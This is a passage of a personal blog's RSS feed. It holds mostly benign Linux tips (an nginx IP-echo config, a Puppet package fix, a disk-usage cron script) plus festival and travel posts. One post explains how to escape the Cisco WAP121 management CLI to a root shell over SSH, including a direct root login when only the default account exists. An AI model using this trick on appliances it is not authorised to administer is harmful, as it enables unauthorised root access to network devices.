  5252.    <pubDate>Sun, 05 Aug 2012 23:58:00 +0000</pubDate>
  5253.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  5254.    <description><![CDATA[<p>Thanks to the <a href="http://wiki.nginx.org/HttpEchoModule" title="HttpEchoModule">ngx_echo</a> module, it is trivially easy to build a clone of the <a href="http://icanhazip.com" title="icanhazip.com">icanhazip.com</a> service with <a href="http://www.nginx.org/" title="nginx">nginx</a>:</p>
  5255. <pre>
  5256. server {
  5257. listen 80;
  5258. listen [::]:80;
  5259.  
  5260. location / {
  5261. echo $remote_addr;
  5262. }  
  5263. }
  5264. </pre>
  5265. ]]></description>
  5266.    <content:encoded><![CDATA[<p>Thanks to the <a href="http://wiki.nginx.org/HttpEchoModule" title="HttpEchoModule">ngx_echo</a> module, it is trivially easy to build a clone of the <a href="http://icanhazip.com" title="icanhazip.com">icanhazip.com</a> service with <a href="http://www.nginx.org/" title="nginx">nginx</a>:</p>
  5267. <pre>
  5268. server {
  5269. listen 80;
  5270. listen [::]:80;
  5271.  
  5272. location / {
  5273. echo $remote_addr;
  5274. }  
  5275. }
  5276. </pre>
  5277. ]]></content:encoded>
  5278.  </item>
  5279.  
  5280.  <item>
  5281.    <title>How to get a Rootshell on a Cisco WAP121</title>
  5282.    <link>https://blog.x-way.org/Networking/2012/08/05/How-to-get-a-Rootshell-on-a-Cisco-WAP121.html</link>
  5283.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324187</guid>
  5284.    <dc:creator>Andreas Jaggi</dc:creator>
  5285.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5286.    <pubDate>Sun, 05 Aug 2012 20:02:00 +0000</pubDate>
  5287.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  5288.    <description><![CDATA[<p>The <a href="http://www.cisco.com/en/US/products/ps12250/index.html" title="Cisco WAP121 Wireless-N Access Point with PoE">Cisco WAP121</a> runs a Linux based firmware. This is how you get a Rootshell on it:</p>
  5289. <ol>
  5290. <li>Login to the Web GUI of the WAP121 and enable the SSH management access</li>
  5291. <li>Login with SSH and enter this command: <code >sh</code></li>
  5292. </ol>
  5293. <p>
  5294. This probably works with the Cisco WAP321 as well (I only tested with the WAP121).<br>
  5295. Also when having still only the one 'cisco' user account configured you can directly get a Rootshell via SSH like this: <code>ssh -l root@&lt;WAP121 IP&gt;</code>
  5296. </p>
  5297. ]]></description>
  5298.    <content:encoded><![CDATA[<p>The <a href="http://www.cisco.com/en/US/products/ps12250/index.html" title="Cisco WAP121 Wireless-N Access Point with PoE">Cisco WAP121</a> runs a Linux based firmware. This is how you get a Rootshell on it:</p>
  5299. <ol>
  5300. <li>Login to the Web GUI of the WAP121 and enable the SSH management access</li>
  5301. <li>Login with SSH and enter this command: <code >sh</code></li>
  5302. </ol>
  5303. <p>
  5304. This probably works with the Cisco WAP321 as well (I only tested with the WAP121).<br>
  5305. Also when having still only the one 'cisco' user account configured you can directly get a Rootshell via SSH like this: <code>ssh -l root@&lt;WAP121 IP&gt;</code>
  5306. </p>
  5307. ]]></content:encoded>
  5308.  </item>
  5309.  
  5310.  <item>
  5311.    <title>Artiphys 2012</title>
  5312.    <link>https://blog.x-way.org/Badges/2012/03/31/Artiphys-2012.html</link>
  5313.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324186</guid>
  5314.    <dc:creator>Andreas Jaggi</dc:creator>
  5315.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5316.    <pubDate>Sat, 31 Mar 2012 09:04:00 +0000</pubDate>
  5317.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5318.    <description><![CDATA[<p>After the summer festivals of Sydney, now also the festivals in Switzerland start again.<br>First one this year: <a href="http://www.artiphys.ch/" title="Festival Artiphys">Artiphys 2012</a></p>
  5319. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2012.jpeg" alt="Artiphys 2012" height="312" width="225"></p>
  5320. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2012_Artist.jpeg" alt="Artiphys 2012" height="316" width="227"></p>
  5321. ]]></description>
  5322.    <content:encoded><![CDATA[<p>After the summer festivals of Sydney, now also the festivals in Switzerland start again.<br>First one this year: <a href="http://www.artiphys.ch/" title="Festival Artiphys">Artiphys 2012</a></p>
  5323. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2012.jpeg" alt="Artiphys 2012" height="312" width="225"></p>
  5324. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2012_Artist.jpeg" alt="Artiphys 2012" height="316" width="227"></p>
  5325. ]]></content:encoded>
  5326.  </item>
  5327.  
  5328.  <item>
  5329.    <title>Fix empty Puppet lsbdistcodename on Debian</title>
  5330.    <link>https://blog.x-way.org/Linux/2012/02/14/Fix-empty-puppet-lsbdistcodename-on-Debian.html</link>
  5331.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324184</guid>
  5332.    <dc:creator>Andreas Jaggi</dc:creator>
  5333.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5334.    <pubDate>Tue, 14 Feb 2012 23:15:00 +0000</pubDate>
  5335.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  5336.    <description><![CDATA[<p>While playing around with my <a href="http://puppetlabs.com/" title="Puppet Labs: The Leading IT Automation Software Solution">Puppet</a> configuration I discovered that the 'system facts' returned by the <a href="http://puppetlabs.com/puppet/related-projects/facter/" title="The Facter Program Quickly Gathers Basic Node Information">Facter</a> helper tool were not consistent on my Debian boxes.</p>
  5337. <p>On some machines Facter properly reported all <a href="http://www.linuxfoundation.org/collaborate/workgroups/lsb" title="Linux Standard Base">LSB</a> related facts of the system, while on other machines it did not report any such information.<br>The problem occurred on about 50% of the hosts, so I excluded a bug introduced by manual over-tuning of the system configuration.</p>
  5338. <p>Further investigation showed that Facter uses the <code>lsb_release</code> command to collect the LSB information of the system.<br>On Debian this command is provided by the <code>lsb-release</code> package which was only installed on half of my systems...</p>
  5339. <p>Now my Puppet manifests include the following configuration directive which should prevent this problem in the future :-)</p>
  5340. <pre>
  5341. package { 'lsb-release':
  5342. ensure => installed,
  5343. }
  5344. </pre>
  5345. ]]></description>
  5346.    <content:encoded><![CDATA[<p>While playing around with my <a href="http://puppetlabs.com/" title="Puppet Labs: The Leading IT Automation Software Solution">Puppet</a> configuration I discovered that the 'system facts' returned by the <a href="http://puppetlabs.com/puppet/related-projects/facter/" title="The Facter Program Quickly Gathers Basic Node Information">Facter</a> helper tool were not consistent on my Debian boxes.</p>
  5347. <p>On some machines Facter properly reported all <a href="http://www.linuxfoundation.org/collaborate/workgroups/lsb" title="Linux Standard Base">LSB</a> related facts of the system, while on other machines it did not report any such information.<br>The problem occurred on about 50% of the hosts, so I excluded a bug introduced by manual over-tuning of the system configuration.</p>
  5348. <p>Further investigation showed that Facter uses the <code>lsb_release</code> command to collect the LSB information of the system.<br>On Debian this command is provided by the <code>lsb-release</code> package which was only installed on half of my systems...</p>
  5349. <p>Now my Puppet manifests include the following configuration directive which should prevent this problem in the future :-)</p>
  5350. <pre>
  5351. package { 'lsb-release':
  5352. ensure => installed,
  5353. }
  5354. </pre>
  5355. ]]></content:encoded>
  5356.  </item>
  5357.  
  5358.  <item>
  5359.    <title>Big Day Out</title>
  5360.    <link>https://blog.x-way.org/Music/2012/01/29/Big-Day-Out.html</link>
  5361.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324183</guid>
  5362.    <dc:creator>Andreas Jaggi</dc:creator>
  5363.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5364.    <pubDate>Sun, 29 Jan 2012 13:28:00 +0000</pubDate>
  5365.    <category domain="https://blog.x-way.org/Music">Music</category>
  5366.    <description><![CDATA[<p>One advantage of being in Australia during the swiss winter is that you can go to music festivals in January! And so I did :-)</p>
  5367. <p>
  5368. Last thursday I went to the <a href="https://web.archive.org/web/20120130215810/https://www.bigdayout.com/" title="Big Day Out (archive.org)">Big Day Out</a> festival in <a href="https://web.archive.org/web/20120204011324/http://sydney.bigdayout.com/" title="Big Day Out Sydney 2012 (archive.org)">Sydney</a>.<br>
  5369. What is interesting compared to festivals in Europe is that in Australia the festival starts at 11 in the morning and ends at 11:45 in the evening, whereas in Switzerland festivals start around 5 in the afternoon and end around 5-6 in the morning.</p>
  5370. <p>I really liked the performances of <a href="http://www.parkwaydriverock.com/" title="Parkway Drive">Parkway Drive</a>, <a href="http://www.misskittin.com/" title="MissKittin's Tree">Miss Kittin</a>, <a href="http://royksopp.com/" title="Röyksopp">Röyksopp</a>, <a href="http://www.bassnectar.net/" title="BASSNECTAR">Bassnectar</a>, <a href="http://www.kasabian.co.uk/" title="Kasabian">Kasabian</a>, <a href="http://www.soundgardenworld.com/" title="Soundgarden World">Soundgarden</a> and <a href="http://regurgitator.net/" title="Regurgitator">Regurgitator</a>.<br>
  5371. Also it was nice to catch a glimpse of <a href="http://www.thejezabels.com/" title="The Jezabels">The Jezabels</a>, <a href="https://hilltophoods.com" title="HILLTOP HOODS : I LOVE IT">Hilltop Hoods</a>, <a href="http://kittydaisyandlewis.com/" title="kittydaisyandlewis">Kitty, Daisy &amp; Lewis</a> and the show of <a href="https://web.archive.org/web/20120201193949/http://kanyewest.com/" title="Kayne West (archive.org)">Kayne West</a>.<br>
  5372. A bit disapointing was the performance of <a href="https://web.archive.org/web/20120207185623/https://www.cavaleraconspiracy.com/" title="Cavalera Conspiracy (archive.org)">Cavalera Conspiracy</a>. They even had to fallback to popular <a href="https://web.archive.org/web/20120213114918/http://www.sepultura.com/" title="SEPULTURA.COM (archive.org)">Sepultura</a> songs (<a href="http://www.youtube.com/watch?v=6ODNxy3YOPU" title="Sepultura - Refuse/Resist">Refuse/Resist</a>, <a href="http://www.youtube.com/watch?v=F_6IjeprfEs" title="Sepultura - Roots Bloody Roots">Roots Bloody Roots</a>) in order to get the crowd moving. On the other hand it was lucky for me, so I got to see a live concert of Sepultura (performed by the founders of Sepultura!), something I didn't think I would ever see after Max Cavalera had left the band.<br>
  5373. Unfortunately the last train back was before the end of the festival and so I did miss <a href="https://web.archive.org/web/20120131113223/http://www.thisisnero.com/" title="This Is Nero (archive.org)">Nero</a>.</p>
  5374.  
  5375. <p>
  5376. <img src="https://blog.x-way.org/images/bigdayout_pineapple_drink.jpg" alt="Big Day Out branded Pineapple Drink" height="512" width="384">
  5377. <img src="https://blog.x-way.org/images/bigdayout_mainstages.jpg" alt="Big Day Out Sydney Olympic Park Mainstages" height="384" width="512">
  5378. <img src="https://blog.x-way.org/images/bigdayout_ferris_wheel.jpg" alt="Big Day Out Ferris Wheel inside the 'Boiler Room' hall" height="512" width="384">
  5379. <img src="https://blog.x-way.org/images/bigdayout_misskittin.jpg" alt="Miss Kittin @ Big Day Out" height="384" width="512">
  5380. <img src="https://blog.x-way.org/images/bigdayout_happybeer.jpg" alt="Happy Beer @ Big Day Out" height="512" width="384">
  5381. <img src="https://blog.x-way.org/images/bigdayout_regurgitator.jpg" alt="Regurgitator @ Big Day Out" height="384" width="512">
  5382. <img src="https://blog.x-way.org/images/bigdayout_cavalera_conspiracy.jpg" alt="Cavalera Conspiracy @ Big Day Out" height="512" width="384">
  5383. </p>
  5384. ]]></description>
  5385.    <content:encoded><![CDATA[<p>One advantage of being in Australia during the swiss winter is that you can go to music festivals in January! And so I did :-)</p>
  5386. <p>
  5387. Last thursday I went to the <a href="https://web.archive.org/web/20120130215810/https://www.bigdayout.com/" title="Big Day Out (archive.org)">Big Day Out</a> festival in <a href="https://web.archive.org/web/20120204011324/http://sydney.bigdayout.com/" title="Big Day Out Sydney 2012 (archive.org)">Sydney</a>.<br>
  5388. What is interesting compared to festivals in Europe is that in Australia the festival starts at 11 in the morning and ends at 11:45 in the evening, whereas in Switzerland festivals start around 5 in the afternoon and end around 5-6 in the morning.</p>
  5389. <p>I really liked the performances of <a href="http://www.parkwaydriverock.com/" title="Parkway Drive">Parkway Drive</a>, <a href="http://www.misskittin.com/" title="MissKittin's Tree">Miss Kittin</a>, <a href="http://royksopp.com/" title="Röyksopp">Röyksopp</a>, <a href="http://www.bassnectar.net/" title="BASSNECTAR">Bassnectar</a>, <a href="http://www.kasabian.co.uk/" title="Kasabian">Kasabian</a>, <a href="http://www.soundgardenworld.com/" title="Soundgarden World">Soundgarden</a> and <a href="http://regurgitator.net/" title="Regurgitator">Regurgitator</a>.<br>
  5390. Also it was nice to catch a glimpse of <a href="http://www.thejezabels.com/" title="The Jezabels">The Jezabels</a>, <a href="https://hilltophoods.com" title="HILLTOP HOODS : I LOVE IT">Hilltop Hoods</a>, <a href="http://kittydaisyandlewis.com/" title="kittydaisyandlewis">Kitty, Daisy &amp; Lewis</a> and the show of <a href="https://web.archive.org/web/20120201193949/http://kanyewest.com/" title="Kayne West (archive.org)">Kayne West</a>.<br>
  5391. A bit disapointing was the performance of <a href="https://web.archive.org/web/20120207185623/https://www.cavaleraconspiracy.com/" title="Cavalera Conspiracy (archive.org)">Cavalera Conspiracy</a>. They even had to fallback to popular <a href="https://web.archive.org/web/20120213114918/http://www.sepultura.com/" title="SEPULTURA.COM (archive.org)">Sepultura</a> songs (<a href="http://www.youtube.com/watch?v=6ODNxy3YOPU" title="Sepultura - Refuse/Resist">Refuse/Resist</a>, <a href="http://www.youtube.com/watch?v=F_6IjeprfEs" title="Sepultura - Roots Bloody Roots">Roots Bloody Roots</a>) in order to get the crowd moving. On the other hand it was lucky for me, so I got to see a live concert of Sepultura (performed by the founders of Sepultura!), something I didn't think I would ever see after Max Cavalera had left the band.<br>
  5392. Unfortunately the last train back was before the end of the festival and so I did miss <a href="https://web.archive.org/web/20120131113223/http://www.thisisnero.com/" title="This Is Nero (archive.org)">Nero</a>.</p>
  5393.  
  5394. <p>
  5395. <img src="https://blog.x-way.org/images/bigdayout_pineapple_drink.jpg" alt="Big Day Out branded Pineapple Drink" height="512" width="384">
  5396. <img src="https://blog.x-way.org/images/bigdayout_mainstages.jpg" alt="Big Day Out Sydney Olympic Park Mainstages" height="384" width="512">
  5397. <img src="https://blog.x-way.org/images/bigdayout_ferris_wheel.jpg" alt="Big Day Out Ferris Wheel inside the 'Boiler Room' hall" height="512" width="384">
  5398. <img src="https://blog.x-way.org/images/bigdayout_misskittin.jpg" alt="Miss Kittin @ Big Day Out" height="384" width="512">
  5399. <img src="https://blog.x-way.org/images/bigdayout_happybeer.jpg" alt="Happy Beer @ Big Day Out" height="512" width="384">
  5400. <img src="https://blog.x-way.org/images/bigdayout_regurgitator.jpg" alt="Regurgitator @ Big Day Out" height="384" width="512">
  5401. <img src="https://blog.x-way.org/images/bigdayout_cavalera_conspiracy.jpg" alt="Cavalera Conspiracy @ Big Day Out" height="512" width="384">
  5402. </p>
  5403. ]]></content:encoded>
  5404.  </item>
  5405.  
  5406.  <item>
  5407.    <title>Keren Ann</title>
  5408.    <link>https://blog.x-way.org/Music/2012/01/15/Keren-Ann.html</link>
  5409.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324182</guid>
  5410.    <dc:creator>Andreas Jaggi</dc:creator>
  5411.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5412.    <pubDate>Sun, 15 Jan 2012 12:52:00 +0000</pubDate>
  5413.    <category domain="https://blog.x-way.org/Music">Music</category>
  5414.    <description><![CDATA[<p>Listening to <a href="http://www.kerenann.com/" title="Keren Ann">Keren Ann</a> is just perfect when you have to work on a rainy Sunday.<br>Thank you <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop</a> for showing me her music.</p>
  5415. <p><a href="https://youtu.be/R-0Qx8HwlW4" title="Keren Ann - My name is trouble - YouTube">Keren Ann - My name is trouble</a></p>
  5416. ]]></description>
  5417.    <content:encoded><![CDATA[<p>Listening to <a href="http://www.kerenann.com/" title="Keren Ann">Keren Ann</a> is just perfect when you have to work on a rainy Sunday.<br>Thank you <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop</a> for showing me her music.</p>
  5418. <p><a href="https://youtu.be/R-0Qx8HwlW4" title="Keren Ann - My name is trouble - YouTube">Keren Ann - My name is trouble</a></p>
  5419. ]]></content:encoded>
  5420.  </item>
  5421.  
  5422.  <item>
  5423.    <title>Sydney</title>
  5424.    <link>https://blog.x-way.org/Misc/2012/01/07/Sydney.html</link>
  5425.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324181</guid>
  5426.    <dc:creator>Andreas Jaggi</dc:creator>
  5427.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5428.    <pubDate>Sat, 07 Jan 2012 12:33:00 +0000</pubDate>
  5429.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  5430.    <description><![CDATA[<p>Yesterday after work we had some beers at <a href="http://www.thelocal.com.au/" title="The Local Taphouse">The Local Taphouse</a> (including some fine porter from <a href="http://www.brewdog.com/" title="BrewDog | Scottish Craft Beer">BrewDog</a> to increase my shareholder value) and then we went on to go out in some clubs, <em>in shorts and flip-flops</em>.<br>Astonishingly we had no problems getting inside, anywhere else in the world this would not be possible!</p>
  5431. <p>This morning then up again for some early surfing at Bondi before all the tourists arrive.<br>And now chilling in my <a href="http://www.kammok.com/" title="Kammok">Kammok</a> under the trees in the frontyard :-)</p>
  5432. <p><img src="https://blog.x-way.org/images/frontyard_kammok.jpeg" alt="Frontyard Kammok" height="360" width="480"></p>
  5433. ]]></description>
  5434.    <content:encoded><![CDATA[<p>Yesterday after work we had some beers at <a href="http://www.thelocal.com.au/" title="The Local Taphouse">The Local Taphouse</a> (including some fine porter from <a href="http://www.brewdog.com/" title="BrewDog | Scottish Craft Beer">BrewDog</a> to increase my shareholder value) and then we went on to go out in some clubs, <em>in shorts and flip-flops</em>.<br>Astonishingly we had no problems getting inside, anywhere else in the world this would not be possible!</p>
  5435. <p>This morning then up again for some early surfing at Bondi before all the tourists arrive.<br>And now chilling in my <a href="http://www.kammok.com/" title="Kammok">Kammok</a> under the trees in the frontyard :-)</p>
  5436. <p><img src="https://blog.x-way.org/images/frontyard_kammok.jpeg" alt="Frontyard Kammok" height="360" width="480"></p>
  5437. ]]></content:encoded>
  5438.  </item>
  5439.  
  5440.  <item>
  5441.    <title>Packing</title>
  5442.    <link>https://blog.x-way.org/Misc/2011/12/24/Packing.html</link>
  5443.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324180</guid>
  5444.    <dc:creator>Andreas Jaggi</dc:creator>
  5445.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5446.    <pubDate>Sat, 24 Dec 2011 11:49:00 +0000</pubDate>
  5447.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  5448.    <description><![CDATA[<p>This morning I started to prepare the bagagges for my trip to <a href="http://events.ccc.de/congress/2011/" title="28th Chaos Computing Congress">28C3</a> and for the two months in Sydney.<br>
  5449. While stowing away all my stuff in boxes so I can sublet my room I found old boxes with stuff, which I did stow away over a year ago when I went to Sydney the last time and I've never even thought about since!</p>
  5450. <p>As I did not have time to open them today I don't even know what is in those boxes. Probably I should just throw them away when I come back from Sydney, there can't be anything important in there :-)</p>
  5451. ]]></description>
  5452.    <content:encoded><![CDATA[<p>This morning I started to prepare the bagagges for my trip to <a href="http://events.ccc.de/congress/2011/" title="28th Chaos Computing Congress">28C3</a> and for the two months in Sydney.<br>
  5453. While stowing away all my stuff in boxes so I can sublet my room I found old boxes with stuff, which I did stow away over a year ago when I went to Sydney the last time and I've never even thought about since!</p>
  5454. <p>As I did not have time to open them today I don't even know what is in those boxes. Probably I should just throw them away when I come back from Sydney, there can't be anything important in there :-)</p>
  5455. ]]></content:encoded>
  5456.  </item>
  5457.  
  5458.  <item>
  5459.    <title>Open Systems</title>
  5460.    <link>https://blog.x-way.org/Badges/2011/12/24/Open-Systems.html</link>
  5461.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324179</guid>
  5462.    <dc:creator>Andreas Jaggi</dc:creator>
  5463.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5464.    <pubDate>Sat, 24 Dec 2011 08:31:00 +0000</pubDate>
  5465.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5466.    <description><![CDATA[<p>Let's finish the badge advent calendar like it started - with a tech conference badge. Enjoy my <a href="http://www.open.ch/" title="Open Systems AG">Open Systems</a> nametag:</p>
  5467. <p><img src="https://blog.x-way.org/images/badges/opensystems.jpeg" alt="Open Systems Nametag" height="62" width="203"></p>
  5468. ]]></description>
  5469.    <content:encoded><![CDATA[<p>Let's finish the badge advent calendar like it started - with a tech conference badge. Enjoy my <a href="http://www.open.ch/" title="Open Systems AG">Open Systems</a> nametag:</p>
  5470. <p><img src="https://blog.x-way.org/images/badges/opensystems.jpeg" alt="Open Systems Nametag" height="62" width="203"></p>
  5471. ]]></content:encoded>
  5472.  </item>
  5473.  
  5474.  <item>
  5475.    <title>Soiree BAM</title>
  5476.    <link>https://blog.x-way.org/Badges/2011/12/23/Soiree-BAM.html</link>
  5477.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324178</guid>
  5478.    <dc:creator>Andreas Jaggi</dc:creator>
  5479.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5480.    <pubDate>Fri, 23 Dec 2011 08:43:00 +0000</pubDate>
  5481.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5482.    <description><![CDATA[<p>One of the rare concert evenings at Satellite where even the technicians had to have an additional badge (but nevertheless this is another one of a kind memory): <a href="http://sat.epfl.ch/photos/album.php?cat=4&amp;season=0&amp;album=1" title="Soiree BAM 2005 Satellite">Soiree BAM 2005</a></p>
  5483. <p><img src="https://blog.x-way.org/images/badges/Soiree_BAM_2005.jpeg" alt="Soiree BAM" height="145" width="179"></p>
  5484. ]]></description>
  5485.    <content:encoded><![CDATA[<p>One of the rare concert evenings at Satellite where even the technicians had to have an additional badge (but nevertheless this is another one of a kind memory): <a href="http://sat.epfl.ch/photos/album.php?cat=4&amp;season=0&amp;album=1" title="Soiree BAM 2005 Satellite">Soiree BAM 2005</a></p>
  5486. <p><img src="https://blog.x-way.org/images/badges/Soiree_BAM_2005.jpeg" alt="Soiree BAM" height="145" width="179"></p>
  5487. ]]></content:encoded>
  5488.  </item>
  5489.  
  5490.  <item>
  5491.    <title>Balelec 2005</title>
  5492.    <link>https://blog.x-way.org/Badges/2011/12/22/Balelec-2005.html</link>
  5493.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324177</guid>
  5494.    <dc:creator>Andreas Jaggi</dc:creator>
  5495.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5496.    <pubDate>Thu, 22 Dec 2011 06:56:00 +0000</pubDate>
  5497.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5498.    <description><![CDATA[<p>There we go, the first year I participated as staff: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2005</a></p>
  5499. <p><img src="https://blog.x-way.org/images/badges/Balelec_2005.jpeg" alt="Balelec 2005" height="271" width="189"></p>
  5500. ]]></description>
  5501.    <content:encoded><![CDATA[<p>There we go, the first year I participated as staff: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2005</a></p>
  5502. <p><img src="https://blog.x-way.org/images/badges/Balelec_2005.jpeg" alt="Balelec 2005" height="271" width="189"></p>
  5503. ]]></content:encoded>
  5504.  </item>
  5505.  
  5506.  <item>
  5507.    <title>Balelec 2006</title>
  5508.    <link>https://blog.x-way.org/Badges/2011/12/21/Balelec-2006.html</link>
  5509.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324176</guid>
  5510.    <dc:creator>Andreas Jaggi</dc:creator>
  5511.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5512.    <pubDate>Wed, 21 Dec 2011 08:11:00 +0000</pubDate>
  5513.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5514.    <description><![CDATA[<p>Luckily this one took place very year (for more than 30 years now!): <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2006</a></p>
  5515. <p><img src="https://blog.x-way.org/images/badges/Balelec_2006.jpeg" alt="Balelec 2006" height="270" width="189"></p>
  5516. ]]></description>
  5517.    <content:encoded><![CDATA[<p>Luckily this one took place very year (for more than 30 years now!): <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2006</a></p>
  5518. <p><img src="https://blog.x-way.org/images/badges/Balelec_2006.jpeg" alt="Balelec 2006" height="270" width="189"></p>
  5519. ]]></content:encoded>
  5520.  </item>
  5521.  
  5522.  <item>
  5523.    <title>Closedair 2006</title>
  5524.    <link>https://blog.x-way.org/Badges/2011/12/20/Closedair-2006.html</link>
  5525.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324175</guid>
  5526.    <dc:creator>Andreas Jaggi</dc:creator>
  5527.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5528.    <pubDate>Tue, 20 Dec 2011 10:23:00 +0000</pubDate>
  5529.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5530.    <description><![CDATA[<p>Yet another great event which no longer exists: ClosedAir 2006</p>
  5531. <p><img src="https://blog.x-way.org/images/badges/Closedair_2006.jpeg" alt="Closedair 2006" height="155" width="242"></p>
  5532. ]]></description>
  5533.    <content:encoded><![CDATA[<p>Yet another great event which no longer exists: ClosedAir 2006</p>
  5534. <p><img src="https://blog.x-way.org/images/badges/Closedair_2006.jpeg" alt="Closedair 2006" height="155" width="242"></p>
  5535. ]]></content:encoded>
  5536.  </item>
  5537.  
  5538.  <item>
  5539.    <title>LinuxWorld 2007</title>
  5540.    <link>https://blog.x-way.org/Badges/2011/12/19/LinuxWorld-2007.html</link>
  5541.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324174</guid>
  5542.    <dc:creator>Andreas Jaggi</dc:creator>
  5543.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5544.    <pubDate>Mon, 19 Dec 2011 08:35:00 +0000</pubDate>
  5545.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5546.    <description><![CDATA[<p>Let's start the last week of this badge advent calendar with another tech conference badge (looks like the conference no longer exists, thus no link to any website): San Francisco LinuxWorld 2007</p>
  5547. <p><img src="https://blog.x-way.org/images/badges/Linuxworld_2007.jpeg" alt="LinuxWorld 2007" height="158" width="247"></p>
  5548. ]]></description>
  5549.    <content:encoded><![CDATA[<p>Let's start the last week of this badge advent calendar with another tech conference badge (looks like the conference no longer exists, thus no link to any website): San Francisco LinuxWorld 2007</p>
  5550. <p><img src="https://blog.x-way.org/images/badges/Linuxworld_2007.jpeg" alt="LinuxWorld 2007" height="158" width="247"></p>
  5551. ]]></content:encoded>
  5552.  </item>
  5553.  
  5554.  <item>
  5555.    <title>Artiphys 2008</title>
  5556.    <link>https://blog.x-way.org/Badges/2011/12/18/Artiphys-2008.html</link>
  5557.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324173</guid>
  5558.    <dc:creator>Andreas Jaggi</dc:creator>
  5559.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5560.    <pubDate>Sun, 18 Dec 2011 12:46:00 +0000</pubDate>
  5561.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5562.    <description><![CDATA[<p>And there the other student music festival which managed to provide badges: <a href="http://www.artiphys.ch/" title="Festival Artiphys">Artiphys 2008</a></p>
  5563. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2008.jpeg" alt="Artiphys 2008" height="189" width="269"></p>
  5564. ]]></description>
  5565.    <content:encoded><![CDATA[<p>And there the other student music festival which managed to provide badges: <a href="http://www.artiphys.ch/" title="Festival Artiphys">Artiphys 2008</a></p>
  5566. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2008.jpeg" alt="Artiphys 2008" height="189" width="269"></p>
  5567. ]]></content:encoded>
  5568.  </item>
  5569.  
  5570.  <item>
  5571.    <title>check_disk_usage.sh</title>
  5572.    <link>https://blog.x-way.org/Linux/2011/12/17/check_disk_usage_sh.html</link>
  5573.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324172</guid>
  5574.    <dc:creator>Andreas Jaggi</dc:creator>
  5575.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5576.    <pubDate>Sat, 17 Dec 2011 17:09:00 +0000</pubDate>
  5577.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  5578.    <description><![CDATA[<p>Quick and dirty way to get an alert before your server starts to go crazy because of a full disk.</p>
  5579.  
  5580. <p>This script checks if a disk is more than 75% full.</p>
  5581.  
  5582. <pre>#!/bin/bash
  5583.  
  5584. df -h | awk '/%/ {
  5585.        limit = 75
  5586.        percent = sprintf("%d",$5)
  5587.        if ( percent > limit ) {
  5588.                print "Warning: ",$6," (",$1,") is to ",percent,"% full:"
  5589.                print $0
  5590.        }
  5591. }'</pre>
  5592.  
  5593. <p>Save it under /root/check_disk_usage.sh and create the following crontab entry to check the disk usage every day at half past midnight.</p>
  5594.  
  5595. <pre>30  0  *   *   *     /root/check_disk_usage.sh</pre>
  5596.  
  5597. <p>Assuming your host has configured an MTA and defined a recipient for root@&lt;yourhost&gt;, you should get an e-mail whenever a disk is more than 75% full.</p>
